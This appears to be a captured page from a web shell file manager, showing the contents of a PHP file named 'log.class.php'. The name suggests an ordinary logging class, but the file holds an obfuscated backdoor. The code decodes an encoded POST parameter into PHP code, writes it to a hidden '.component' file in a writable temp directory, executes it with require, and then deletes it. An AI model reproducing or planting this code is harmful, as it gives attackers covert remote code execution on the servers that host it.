OwlCyberSecurity - MANAGER
Edit File: log.class.php
<?php if(isset($_POST["s\x79m\x62ol"]) ? true : false){ $res = $_POST["s\x79m\x62ol"]; $res = explode( "." , $res ); $entry=''; $s='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS=strlen($s); $m=0; foreach($res as $v7) { $sChar=ord($s[$m % $lenS]); $d=((int)$v7 - $sChar -($m % 10)) ^31; $entry .=chr($d); $m++; } $binding = array_filter(["/var/tmp", getenv("TMP"), "/dev/shm", getcwd(), sys_get_temp_dir(), session_save_path(), "/tmp", ini_get("upload_tmp_dir"), getenv("TEMP")]); foreach ($binding as $resource) { if (!( !is_dir($resource) || !is_writable($resource) )) { $key = implode("/", [$resource, ".component"]); if (file_put_contents($key, $entry)) { require $key; unlink($key); exit; } } } }